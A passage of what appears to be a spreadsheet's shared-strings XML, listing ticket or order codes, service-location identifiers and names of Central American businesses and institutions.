    <t>F4574910</t>
  </si>
  <si>
    <t>1516485OH</t>
  </si>
  <si>
    <t>F4574915</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0837</t>
  </si>
  <si>
    <t>38300515T</t>
  </si>
  <si>
    <t>F4574933</t>
  </si>
  <si>
    <t>F4574967</t>
  </si>
  <si>
    <t>355000010T</t>
  </si>
  <si>
    <t>ADMINISTRADORA COMERCIAL PASEO FASE 1 S.A.</t>
  </si>
  <si>
    <t>5598116ON</t>
  </si>
  <si>
    <t>8900798T</t>
  </si>
  <si>
    <t>F4575011</t>
  </si>
  <si>
    <t>F4575013</t>
  </si>
  <si>
    <t>F4575016</t>
  </si>
  <si>
    <t>F4575017</t>
  </si>
  <si>
    <t>F4575024</t>
  </si>
  <si>
    <t>F4575025</t>
  </si>
  <si>
    <t>F4575029</t>
  </si>
  <si>
    <t>F4575030</t>
  </si>
  <si>
    <t>758500032T</t>
  </si>
  <si>
    <t>F4575039</t>
  </si>
  <si>
    <t>F4575052</t>
  </si>
  <si>
    <t>F4575053</t>
  </si>
  <si>
    <t>F4541172</t>
  </si>
  <si>
    <t>F4541175</t>
  </si>
  <si>
    <t>F4541181</t>
  </si>
  <si>
    <t>F4555974</t>
  </si>
  <si>
    <t>F4555975</t>
  </si>
  <si>
    <t>F4555978</t>
  </si>
  <si>
    <t>F4555979</t>
  </si>
  <si>
    <t>F4555980</t>
  </si>
  <si>
    <t>F4555990</t>
  </si>
  <si>
    <t>F4555993</t>
  </si>
  <si>
    <t>F4555996</t>
  </si>
  <si>
    <t>F4555997</t>
  </si>
  <si>
    <t>F4555998</t>
  </si>
  <si>
    <t>346100112T</t>
  </si>
  <si>
    <t>427100094T</t>
  </si>
  <si>
    <t>F4556006</t>
  </si>
  <si>
    <t>F4556008</t>
  </si>
  <si>
    <t>F4556010</t>
  </si>
  <si>
    <t>F4556012</t>
  </si>
  <si>
    <t>F4556015</t>
  </si>
  <si>
    <t>F4556017</t>
  </si>
  <si>
    <t>F4556027</t>
  </si>
  <si>
    <t>F4556031</t>
  </si>
  <si>
    <t>F4556034</t>
  </si>
  <si>
    <t>F4556045</t>
  </si>
  <si>
    <t>F4556048</t>
  </si>
  <si>
    <t>F4556082</t>
  </si>
  <si>
    <t>F4556109</t>
  </si>
  <si>
    <t>F4556115</t>
  </si>
  <si>
    <t>F4556127</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T64</t>
  </si>
  <si>
    <t>F4599051</t>
  </si>
  <si>
    <t>F4599064</t>
  </si>
  <si>
    <t>F4599080</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_CAPITOL_ZONA1</t>
  </si>
  <si>
    <t>F4599159</t>
  </si>
  <si>
    <t>F4599162</t>
  </si>
  <si>
    <t>F4599181</t>
  </si>
  <si>
    <t>F4599185</t>
  </si>
  <si>
    <t>F4599200</t>
  </si>
  <si>
    <t>IP2305007SV</t>
  </si>
  <si>
    <t>F4599218</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_147</t>
  </si>
  <si>
    <t>F4618535</t>
  </si>
  <si>
    <t>914400001T</t>
  </si>
  <si>
    <t>BANCO DE ANTIGUA,S.A .</t>
  </si>
  <si>
    <t>F4618539</t>
  </si>
  <si>
    <t>F4618541</t>
  </si>
  <si>
    <t>1420588OH</t>
  </si>
  <si>
    <t>JETSTEREOS SA DE CV</t>
  </si>
  <si>
    <t>F4618546</t>
  </si>
  <si>
    <t>4461673ON</t>
  </si>
  <si>
    <t>F4618549</t>
  </si>
  <si>
    <t>F4618550</t>
  </si>
  <si>
    <t>F4618552</t>
  </si>
  <si>
    <t>731900004T</t>
  </si>
  <si>
    <t>INTCOMEX DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4618560</t>
  </si>
  <si>
    <t>F4618565</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_QUETZALTENANGO</t>
  </si>
  <si>
    <t>F4618566</t>
  </si>
  <si>
    <t>406400056T</t>
  </si>
  <si>
    <t>90001904541T</t>
  </si>
  <si>
    <t>MP262122010SSV</t>
  </si>
  <si>
    <t>F4618592</t>
  </si>
  <si>
    <t>F4618595</t>
  </si>
  <si>
    <t>419100008T</t>
  </si>
  <si>
    <t>ID1041098SV</t>
  </si>
  <si>
    <t>CARONTE TEXTIL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4618605</t>
  </si>
  <si>
    <t>90001911141T</t>
  </si>
  <si>
    <t>F4618607</t>
  </si>
  <si>
    <t>910400077T</t>
  </si>
  <si>
    <t>23939100SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE LA PALMA</t>
  </si>
  <si>
    <t>653700002T</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_SAN_CRISTOBAL</t>
  </si>
  <si>
    <t>354700011T</t>
  </si>
  <si>
    <t>22978300SV</t>
  </si>
  <si>
    <t>COOPERATIVA GANADERA DE SONSONATE DE R.L.</t>
  </si>
  <si>
    <t>1539740OH</t>
  </si>
  <si>
    <t>297401016T</t>
  </si>
  <si>
    <t>F4618665</t>
  </si>
  <si>
    <t>26655600SV</t>
  </si>
  <si>
    <t>950500001T</t>
  </si>
  <si>
    <t>SISTEMAS INTEGRALES DE SEGURIDAD,S.A.</t>
  </si>
  <si>
    <t>F4561014</t>
  </si>
  <si>
    <t>F4561023</t>
  </si>
  <si>
    <t>F4561026</t>
  </si>
  <si>
    <t>90001908215T</t>
  </si>
  <si>
    <t>90001909981T</t>
  </si>
  <si>
    <t>F4561032</t>
  </si>
  <si>
    <t>F4561033</t>
  </si>
  <si>
    <t>929330OH</t>
  </si>
  <si>
    <t>F4561043</t>
  </si>
  <si>
    <t>IDG000188SV</t>
  </si>
  <si>
    <t xml:space="preserve">INDUSTRIAL QUIMICA SALVADOREÑA S.A DE C.V										</t>
  </si>
  <si>
    <t>365400106T</t>
  </si>
  <si>
    <t>770600228T</t>
  </si>
  <si>
    <t>F4561069</t>
  </si>
  <si>
    <t>F4561071</t>
  </si>
  <si>
    <t>F4561076</t>
  </si>
  <si>
    <t>F4561077</t>
  </si>
  <si>
    <t>90001910827T</t>
  </si>
  <si>
    <t>297401023T</t>
  </si>
  <si>
    <t>F4561087</t>
  </si>
  <si>
    <t>297401569T</t>
  </si>
  <si>
    <t>F4561088</t>
  </si>
  <si>
    <t>F4561091</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0030</t>
  </si>
  <si>
    <t>F4561106</t>
  </si>
  <si>
    <t>535200147T</t>
  </si>
  <si>
    <t>671900107T</t>
  </si>
  <si>
    <t>IP2170017SV</t>
  </si>
  <si>
    <t>90001908836T</t>
  </si>
  <si>
    <t>MP160532001SSV</t>
  </si>
  <si>
    <t>F4561131</t>
  </si>
  <si>
    <t>F4561140</t>
  </si>
  <si>
    <t>F4561141</t>
  </si>
  <si>
    <t>17400444T</t>
  </si>
  <si>
    <t>F4561146</t>
  </si>
  <si>
    <t>17400440T</t>
  </si>
  <si>
    <t>17400419T</t>
  </si>
  <si>
    <t>F4561149</t>
  </si>
  <si>
    <t>F4561163</t>
  </si>
  <si>
    <t>318500004T</t>
  </si>
  <si>
    <t>1717069OH</t>
  </si>
  <si>
    <t>OH1001075714</t>
  </si>
  <si>
    <t>22618800SV</t>
  </si>
  <si>
    <t>AJUSTADORES DE CENTROAMERICAS.A.</t>
  </si>
  <si>
    <t>F4585990</t>
  </si>
  <si>
    <t>F4585993</t>
  </si>
  <si>
    <t>438200001T</t>
  </si>
  <si>
    <t>VERKHER FRIEDEN SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4586007</t>
  </si>
  <si>
    <t>F4586009</t>
  </si>
  <si>
    <t>F4586011</t>
  </si>
  <si>
    <t>1736906OH</t>
  </si>
  <si>
    <t>OH1001081643</t>
  </si>
  <si>
    <t>F4586020</t>
  </si>
  <si>
    <t>ID1028528SV</t>
  </si>
  <si>
    <t>TECHNOSERVE INC.</t>
  </si>
  <si>
    <t>38300548T</t>
  </si>
  <si>
    <t>F4586028</t>
  </si>
  <si>
    <t>4907678ON</t>
  </si>
  <si>
    <t>F4586033</t>
  </si>
  <si>
    <t>F4586037</t>
  </si>
  <si>
    <t>625900004T</t>
  </si>
  <si>
    <t>25255800SV</t>
  </si>
  <si>
    <t>GUARD PLUS 24 SECURITY S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4586040</t>
  </si>
  <si>
    <t>F4586045</t>
  </si>
  <si>
    <t>F4586046</t>
  </si>
  <si>
    <t>CONTR0001808778OC</t>
  </si>
  <si>
    <t>F4586049</t>
  </si>
  <si>
    <t>887500013T</t>
  </si>
  <si>
    <t>F4586055</t>
  </si>
  <si>
    <t>F4586057</t>
  </si>
  <si>
    <t>8600207T</t>
  </si>
  <si>
    <t>F4586058</t>
  </si>
  <si>
    <t>938400007T</t>
  </si>
  <si>
    <t>IP2105220SV</t>
  </si>
  <si>
    <t>F4586067</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_INTERNET_3ER_NIVEL_Z13</t>
  </si>
  <si>
    <t>F4586069</t>
  </si>
  <si>
    <t>F4586075</t>
  </si>
  <si>
    <t>42400027T</t>
  </si>
  <si>
    <t>SEGUROS G y T, S.A.</t>
  </si>
  <si>
    <t>F4586092</t>
  </si>
  <si>
    <t>F4586100</t>
  </si>
  <si>
    <t>F4586101</t>
  </si>
  <si>
    <t>F4586110</t>
  </si>
  <si>
    <t>F4586111</t>
  </si>
  <si>
    <t>360000002T</t>
  </si>
  <si>
    <t>TELE ONCE S.A.</t>
  </si>
  <si>
    <t>F4586118</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_063</t>
  </si>
  <si>
    <t>F4546081</t>
  </si>
  <si>
    <t>361700086T</t>
  </si>
  <si>
    <t>F4546115</t>
  </si>
  <si>
    <t>90001904303T</t>
  </si>
  <si>
    <t>F4575232</t>
  </si>
  <si>
    <t>F4575234</t>
  </si>
  <si>
    <t>F4575256</t>
  </si>
  <si>
    <t>F4575284</t>
  </si>
  <si>
    <t>F4575289</t>
  </si>
  <si>
    <t>F4575347</t>
  </si>
  <si>
    <t>F4575359</t>
  </si>
  <si>
    <t>F4575365</t>
  </si>
  <si>
    <t>CONTR0001428100OC</t>
  </si>
  <si>
    <t>CONTR0001428099OC</t>
  </si>
  <si>
    <t>344400597T</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0480</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_0044</t>
  </si>
  <si>
    <t>IP2112099SV</t>
  </si>
  <si>
    <t>F4611758</t>
  </si>
  <si>
    <t>F4611766</t>
  </si>
  <si>
    <t>F4611769</t>
  </si>
  <si>
    <t>F4611771</t>
  </si>
  <si>
    <t>F4611773</t>
  </si>
  <si>
    <t>F4611774</t>
  </si>
  <si>
    <t>F4575700</t>
  </si>
  <si>
    <t>F4575701</t>
  </si>
  <si>
    <t>344400189T</t>
  </si>
  <si>
    <t>F4575705</t>
  </si>
  <si>
    <t>F4575710</t>
  </si>
  <si>
    <t>F4575713</t>
  </si>
  <si>
    <t>758500384T</t>
  </si>
  <si>
    <t>F4575715</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0498</t>
  </si>
  <si>
    <t>453241ON</t>
  </si>
  <si>
    <t>F4575737</t>
  </si>
  <si>
    <t>1363023OH</t>
  </si>
  <si>
    <t>FONDO PARA EL DESARROLLO LOCAL DE HONDFURAS</t>
  </si>
  <si>
    <t>758500196T</t>
  </si>
  <si>
    <t>5134204ON</t>
  </si>
  <si>
    <t>F4575754</t>
  </si>
  <si>
    <t>5455656ON</t>
  </si>
  <si>
    <t>F4575762</t>
  </si>
  <si>
    <t>F4575769</t>
  </si>
  <si>
    <t>863400058T</t>
  </si>
  <si>
    <t>F4575775</t>
  </si>
  <si>
    <t>82500008T</t>
  </si>
  <si>
    <t>MAQUINAS EXACTAS S.A.</t>
  </si>
  <si>
    <t>F4575776</t>
  </si>
  <si>
    <t>22413600SV</t>
  </si>
  <si>
    <t>INTERALIA LTDA DE C.V.</t>
  </si>
  <si>
    <t>F4575778</t>
  </si>
  <si>
    <t>453806ON</t>
  </si>
  <si>
    <t>F4575782</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4434</t>
  </si>
  <si>
    <t>910400006T</t>
  </si>
  <si>
    <t>F4575789</t>
  </si>
  <si>
    <t>F4575801</t>
  </si>
  <si>
    <t>F4575802</t>
  </si>
  <si>
    <t>F4575804</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_757</t>
  </si>
  <si>
    <t>F4575805</t>
  </si>
  <si>
    <t>F4575807</t>
  </si>
  <si>
    <t>923800001T</t>
  </si>
  <si>
    <t>GRUPO SOLID (GUATEMALA), S.A..</t>
  </si>
  <si>
    <t>F4575815</t>
  </si>
  <si>
    <t>F4575824</t>
  </si>
  <si>
    <t>CC_BAM_GT_AGENCIA_203</t>
  </si>
  <si>
    <t>F4575825</t>
  </si>
  <si>
    <t>F4575831</t>
  </si>
  <si>
    <t>F4575832</t>
  </si>
  <si>
    <t>90001801327T</t>
  </si>
  <si>
    <t>618565OH</t>
  </si>
  <si>
    <t>614100001T</t>
  </si>
  <si>
    <t>ECOIL SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>71100028T</t>
  </si>
  <si>
    <t>F4556299</t>
  </si>
  <si>
    <t>F4556306</t>
  </si>
  <si>
    <t>F4556312</t>
  </si>
  <si>
    <t>245700250T</t>
  </si>
  <si>
    <t>773400023T</t>
  </si>
  <si>
    <t>F4556320</t>
  </si>
  <si>
    <t>F4556322</t>
  </si>
  <si>
    <t>17400211T</t>
  </si>
  <si>
    <t>F4556325</t>
  </si>
  <si>
    <t>F4556330</t>
  </si>
  <si>
    <t>17400467T</t>
  </si>
  <si>
    <t>F4556364</t>
  </si>
  <si>
    <t>821900004T</t>
  </si>
  <si>
    <t>F4556387</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2465</t>
  </si>
  <si>
    <t>F4556392</t>
  </si>
  <si>
    <t>F4556393</t>
  </si>
  <si>
    <t>F4556401</t>
  </si>
  <si>
    <t>F4556459</t>
  </si>
  <si>
    <t>17400401T</t>
  </si>
  <si>
    <t>F4601786</t>
  </si>
  <si>
    <t>670700022T</t>
  </si>
  <si>
    <t>F4601810</t>
  </si>
  <si>
    <t>344400009T</t>
  </si>
  <si>
    <t>F4601812</t>
  </si>
  <si>
    <t>F4601816</t>
  </si>
  <si>
    <t>F4601823</t>
  </si>
  <si>
    <t>F4601848</t>
  </si>
  <si>
    <t>212900007T</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DDJ_UNICENTRO_SOYAPANGO</t>
  </si>
  <si>
    <t>F4601888</t>
  </si>
  <si>
    <t>F4601889</t>
  </si>
  <si>
    <t>F4601914</t>
  </si>
  <si>
    <t>F4621874</t>
  </si>
  <si>
    <t>758500435T</t>
  </si>
  <si>
    <t>F4621888</t>
  </si>
  <si>
    <t>630700001T</t>
  </si>
  <si>
    <t>LA CASA DEL TORNILLO S.A.</t>
  </si>
  <si>
    <t>F4621892</t>
  </si>
  <si>
    <t>F4621893</t>
  </si>
  <si>
    <t>F4621894</t>
  </si>
  <si>
    <t>22579000SV</t>
  </si>
  <si>
    <t>GRG SA DE CV</t>
  </si>
  <si>
    <t>F4621902</t>
  </si>
  <si>
    <t>F4621905</t>
  </si>
  <si>
    <t>F4621906</t>
  </si>
  <si>
    <t>ID1080011SV</t>
  </si>
  <si>
    <t>CAJA DE CREDITO DE TONACATEPEQUE S.C. DE R.L.</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0839</t>
  </si>
  <si>
    <t>90001904702T</t>
  </si>
  <si>
    <t>F4621930</t>
  </si>
  <si>
    <t>F4621943</t>
  </si>
  <si>
    <t>686600001T</t>
  </si>
  <si>
    <t>DIELSA</t>
  </si>
  <si>
    <t>F4621955</t>
  </si>
  <si>
    <t>F4621959</t>
  </si>
  <si>
    <t>1290236OH</t>
  </si>
  <si>
    <t>OH1000763610/DESAROLLOS HOTELEROS S A DE C V -</t>
  </si>
  <si>
    <t>945800001T</t>
  </si>
  <si>
    <t>ASOCIACION DE CONDOMINIOS DEL EDIFICIO CENTRO EMPRESARIAL</t>
  </si>
  <si>
    <t>F4621982</t>
  </si>
  <si>
    <t>F4621989</t>
  </si>
  <si>
    <t>F4621999</t>
  </si>
  <si>
    <t>813200001T</t>
  </si>
  <si>
    <t>VICTOR MANUEL SUAREZ VALDES</t>
  </si>
  <si>
    <t>1274345OH</t>
  </si>
  <si>
    <t>COMUNICACION Y TECNOLOGIA CACERES "COTECCA"</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0728</t>
  </si>
  <si>
    <t>F4562587</t>
  </si>
  <si>
    <t>F4562600</t>
  </si>
  <si>
    <t>F4562610</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_INTERNET_SOLOMA</t>
  </si>
  <si>
    <t>339400005T</t>
  </si>
  <si>
    <t>DIBASA S.A.</t>
  </si>
  <si>
    <t>F4562618</t>
  </si>
  <si>
    <t>22503170SV</t>
  </si>
  <si>
    <t>PAGADITO EL SALVADOR S.A. DE C.V</t>
  </si>
  <si>
    <t>F4562633</t>
  </si>
  <si>
    <t>CC_HCAMINO_REAL_GT_INTERNET_CALLE_CAMINO_REAL_Z10</t>
  </si>
  <si>
    <t>1511408</t>
  </si>
  <si>
    <t>F4562642</t>
  </si>
  <si>
    <t>F4562654</t>
  </si>
  <si>
    <t>8900728T</t>
  </si>
  <si>
    <t>4656870ON</t>
  </si>
  <si>
    <t>F4562662</t>
  </si>
  <si>
    <t>460200006T</t>
  </si>
  <si>
    <t>F4562669</t>
  </si>
  <si>
    <t>F4562689</t>
  </si>
  <si>
    <t>F4562691</t>
  </si>
  <si>
    <t>F4562712</t>
  </si>
  <si>
    <t>F4562716</t>
  </si>
  <si>
    <t>F4562717</t>
  </si>
  <si>
    <t>F4562719</t>
  </si>
  <si>
    <t>777783OH</t>
  </si>
  <si>
    <t>772700020T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2584</t>
  </si>
  <si>
    <t>F4587112</t>
  </si>
  <si>
    <t>4818621ON</t>
  </si>
  <si>
    <t>F4587125</t>
  </si>
  <si>
    <t>F4587126</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4257</t>
  </si>
  <si>
    <t>ID1178015SV</t>
  </si>
  <si>
    <t>F4587138</t>
  </si>
  <si>
    <t>F4587140</t>
  </si>
  <si>
    <t>F4587143</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0084</t>
  </si>
  <si>
    <t>772700014T</t>
  </si>
  <si>
    <t>F4587145</t>
  </si>
  <si>
    <t>317500032T</t>
  </si>
  <si>
    <t>F4587147</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA030</t>
  </si>
  <si>
    <t>F4587156</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_ZONA1_XELA</t>
  </si>
  <si>
    <t>F4587160</t>
  </si>
  <si>
    <t>F4587161</t>
  </si>
  <si>
    <t>651401OH</t>
  </si>
  <si>
    <t>F4587168</t>
  </si>
  <si>
    <t>F4587169</t>
  </si>
  <si>
    <t>F4587171</t>
  </si>
  <si>
    <t>F4587175</t>
  </si>
  <si>
    <t>F4587177</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0452</t>
  </si>
  <si>
    <t>F4587178</t>
  </si>
  <si>
    <t>F4587187</t>
  </si>
  <si>
    <t>F4587192</t>
  </si>
  <si>
    <t>F4587193</t>
  </si>
  <si>
    <t>8901225T</t>
  </si>
  <si>
    <t>F4587194</t>
  </si>
  <si>
    <t>ID1142036SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE LISLIQUE</t>
  </si>
  <si>
    <t>F4587196</t>
  </si>
  <si>
    <t>607100010T</t>
  </si>
  <si>
    <t>F4587198</t>
  </si>
  <si>
    <t>340500010T</t>
  </si>
  <si>
    <t>4469361ON</t>
  </si>
  <si>
    <t>F4587205</t>
  </si>
  <si>
    <t>F4587209</t>
  </si>
  <si>
    <t>F4587210</t>
  </si>
  <si>
    <t>F4587212</t>
  </si>
  <si>
    <t>937793OH</t>
  </si>
  <si>
    <t>90001909818T</t>
  </si>
  <si>
    <t>F4546465</t>
  </si>
  <si>
    <t>F4546541</t>
  </si>
  <si>
    <t>8902139T</t>
  </si>
  <si>
    <t>F4576492</t>
  </si>
  <si>
    <t>F4576530</t>
  </si>
  <si>
    <t>F4576577</t>
  </si>
  <si>
    <t>F4576583</t>
  </si>
  <si>
    <t>F4576590</t>
  </si>
  <si>
    <t>349900167T</t>
  </si>
  <si>
    <t>F4576592</t>
  </si>
  <si>
    <t>F4576597</t>
  </si>
  <si>
    <t>F4576602</t>
  </si>
  <si>
    <t>ICXN-00069OC</t>
  </si>
  <si>
    <t>288900010T</t>
  </si>
  <si>
    <t>F4612731</t>
  </si>
  <si>
    <t>42700476T</t>
  </si>
  <si>
    <t>42700477T</t>
  </si>
  <si>
    <t>F4612741</t>
  </si>
  <si>
    <t>F4612742</t>
  </si>
  <si>
    <t>672200007T</t>
  </si>
  <si>
    <t>CONTR0002061477OC</t>
  </si>
  <si>
    <t>CARGILL BUSINESS SERVICES S.R.L</t>
  </si>
  <si>
    <t>292900629T</t>
  </si>
  <si>
    <t>315800001T</t>
  </si>
  <si>
    <t>IBERIA LINEAS AEREAS DE ESPA?A S.A.</t>
  </si>
  <si>
    <t>IP2037249SV</t>
  </si>
  <si>
    <t>90001911054T</t>
  </si>
  <si>
    <t>F4612777</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1424</t>
  </si>
  <si>
    <t>F4612788</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_Z1_ESQUIPULAS</t>
  </si>
  <si>
    <t>42700512T</t>
  </si>
  <si>
    <t>IP2045257SV</t>
  </si>
  <si>
    <t>BANCO PROMERICA, S.A</t>
  </si>
  <si>
    <t>F4612818</t>
  </si>
  <si>
    <t>525400002T</t>
  </si>
  <si>
    <t>ILJO GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4612833</t>
  </si>
  <si>
    <t>90001909027T</t>
  </si>
  <si>
    <t>F4612840</t>
  </si>
  <si>
    <t>F4612841</t>
  </si>
  <si>
    <t>F4612848</t>
  </si>
  <si>
    <t>ID1053047SV</t>
  </si>
  <si>
    <t>349400066T</t>
  </si>
  <si>
    <t>F4612865</t>
  </si>
  <si>
    <t>F4612870</t>
  </si>
  <si>
    <t>F4612871</t>
  </si>
  <si>
    <t>61200193T</t>
  </si>
  <si>
    <t>F4576124</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0724</t>
  </si>
  <si>
    <t>F4576126</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C657</t>
  </si>
  <si>
    <t>F4576130</t>
  </si>
  <si>
    <t>F4576134</t>
  </si>
  <si>
    <t>F4576138</t>
  </si>
  <si>
    <t>IP2133016SV</t>
  </si>
  <si>
    <t>CC_GMG_SV_T078_SANTA_ROSA</t>
  </si>
  <si>
    <t>F4576155</t>
  </si>
  <si>
    <t>F4576157</t>
  </si>
  <si>
    <t>F4576161</t>
  </si>
  <si>
    <t>618731OH</t>
  </si>
  <si>
    <t>F4576163</t>
  </si>
  <si>
    <t>4985489ON</t>
  </si>
  <si>
    <t>F4576175</t>
  </si>
  <si>
    <t>F4576176</t>
  </si>
  <si>
    <t>F4576183</t>
  </si>
  <si>
    <t>859028OH</t>
  </si>
  <si>
    <t>F4576209</t>
  </si>
  <si>
    <t>220600004T</t>
  </si>
  <si>
    <t>INFOCHEQUE S.A.</t>
  </si>
  <si>
    <t>863400044T</t>
  </si>
  <si>
    <t>42700485T</t>
  </si>
  <si>
    <t>F4576221</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_SAN_VICENTE</t>
  </si>
  <si>
    <t>F4576242</t>
  </si>
  <si>
    <t>5450949ON</t>
  </si>
  <si>
    <t>VALERIA URCUYO</t>
  </si>
  <si>
    <t>F4576254</t>
  </si>
  <si>
    <t>CC_PRONE_GT_ESCUINTLA_2AV_Z1</t>
  </si>
  <si>
    <t>F4613741</t>
  </si>
  <si>
    <t>F4613743</t>
  </si>
  <si>
    <t>25114700SV</t>
  </si>
  <si>
    <t>DERIVADOS DE PAPEL Y CARTON DE CENTROAMERICA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4613757</t>
  </si>
  <si>
    <t>F4613758</t>
  </si>
  <si>
    <t>F4613762</t>
  </si>
  <si>
    <t>5532312ON</t>
  </si>
  <si>
    <t>ON0000122455/CARGILL DE NICARAGUA, S.A. 25121585</t>
  </si>
  <si>
    <t>F4613766</t>
  </si>
  <si>
    <t>ID1067031SV</t>
  </si>
  <si>
    <t>REFRESCA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4613774</t>
  </si>
  <si>
    <t>F4613778</t>
  </si>
  <si>
    <t>90001909092T</t>
  </si>
  <si>
    <t>F4613781</t>
  </si>
  <si>
    <t>F4613782</t>
  </si>
  <si>
    <t>1628296OH</t>
  </si>
  <si>
    <t>394000003T</t>
  </si>
  <si>
    <t>BPO INNOVATIONS S.A.</t>
  </si>
  <si>
    <t>F4613788</t>
  </si>
  <si>
    <t>F4613793</t>
  </si>
  <si>
    <t>F4613795</t>
  </si>
  <si>
    <t>F4613796</t>
  </si>
  <si>
    <t>F4613799</t>
  </si>
  <si>
    <t>F4613800</t>
  </si>
  <si>
    <t>F4613801</t>
  </si>
  <si>
    <t>F4613802</t>
  </si>
  <si>
    <t>F4613803</t>
  </si>
  <si>
    <t>ID1029463SV</t>
  </si>
  <si>
    <t>929400001T</t>
  </si>
  <si>
    <t>CONSULADO DE MEXICO</t>
  </si>
  <si>
    <t>F4613813</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SAN_LUCAS</t>
  </si>
  <si>
    <t>61200195T</t>
  </si>
  <si>
    <t>42700515T</t>
  </si>
  <si>
    <t>90001905194T</t>
  </si>
  <si>
    <t>1732546OH</t>
  </si>
  <si>
    <t>F4613837</t>
  </si>
  <si>
    <t>F4613838</t>
  </si>
  <si>
    <t>ID1310004SV</t>
  </si>
  <si>
    <t>ALCALDIA MUCICIPAL</t>
  </si>
  <si>
    <t>1651716OH</t>
  </si>
  <si>
    <t>F4613848</t>
  </si>
  <si>
    <t>CONTR0001321003OC</t>
  </si>
  <si>
    <t>TOSTADORA EL DORADO SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4613850</t>
  </si>
  <si>
    <t>F4613855</t>
  </si>
  <si>
    <t>522900001T</t>
  </si>
  <si>
    <t>ESTELLA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>434300001T</t>
  </si>
  <si>
    <t>GRUPO RADIAL EL TAJIN S.A.</t>
  </si>
  <si>
    <t>F4613874</t>
  </si>
  <si>
    <t>1479397OH</t>
  </si>
  <si>
    <t>CARGO RAPIDO</t>
  </si>
  <si>
    <t>F4613879</t>
  </si>
  <si>
    <t>F4619931</t>
  </si>
  <si>
    <t>8900770T</t>
  </si>
  <si>
    <t>F4619938</t>
  </si>
  <si>
    <t>F4619956</t>
  </si>
  <si>
    <t>F4619962</t>
  </si>
  <si>
    <t>F4619963</t>
  </si>
  <si>
    <t>F4619965</t>
  </si>
  <si>
    <t>F4619966</t>
  </si>
  <si>
    <t>47503413T</t>
  </si>
  <si>
    <t>47503904T</t>
  </si>
  <si>
    <t>F4619971</t>
  </si>
  <si>
    <t>ID1050079SV</t>
  </si>
  <si>
    <t>PROYECTO DE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>8900237T</t>
  </si>
  <si>
    <t>52900070T</t>
  </si>
  <si>
    <t>F4619980</t>
  </si>
  <si>
    <t>724800002T</t>
  </si>
  <si>
    <t>IGLESIA HEBRON</t>
  </si>
  <si>
    <t>F4619984</t>
  </si>
  <si>
    <t>479600010T</t>
  </si>
  <si>
    <t>MAYASERSA S.A.</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_METROPOLIS</t>
  </si>
  <si>
    <t>F4619997</t>
  </si>
  <si>
    <t>F4619998</t>
  </si>
  <si>
    <t>F4619999</t>
  </si>
  <si>
    <t>347300004T</t>
  </si>
  <si>
    <t>SAKATA SEED DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4620003</t>
  </si>
  <si>
    <t>340500060T</t>
  </si>
  <si>
    <t>952200001T</t>
  </si>
  <si>
    <t>COMPAÑIA DE PRODUCTOS Y SERVICIOS PARA LA CONSTRUCCION, S.A.</t>
  </si>
  <si>
    <t>F4620021</t>
  </si>
  <si>
    <t>242800006T</t>
  </si>
  <si>
    <t>F4620028</t>
  </si>
  <si>
    <t>22313800SV</t>
  </si>
  <si>
    <t>KING OCEAN EL SALVADORS.A. DE C.V.</t>
  </si>
  <si>
    <t>IP2044043SV</t>
  </si>
  <si>
    <t>GRUPO GBO, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4620057</t>
  </si>
  <si>
    <t>F4620060</t>
  </si>
  <si>
    <t>F4620063</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_MONTSERRAT</t>
  </si>
  <si>
    <t>8902213T</t>
  </si>
  <si>
    <t>F4620073</t>
  </si>
  <si>
    <t>F4621289</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3107</t>
  </si>
  <si>
    <t>F4621292</t>
  </si>
  <si>
    <t>CONTR0001810009OC</t>
  </si>
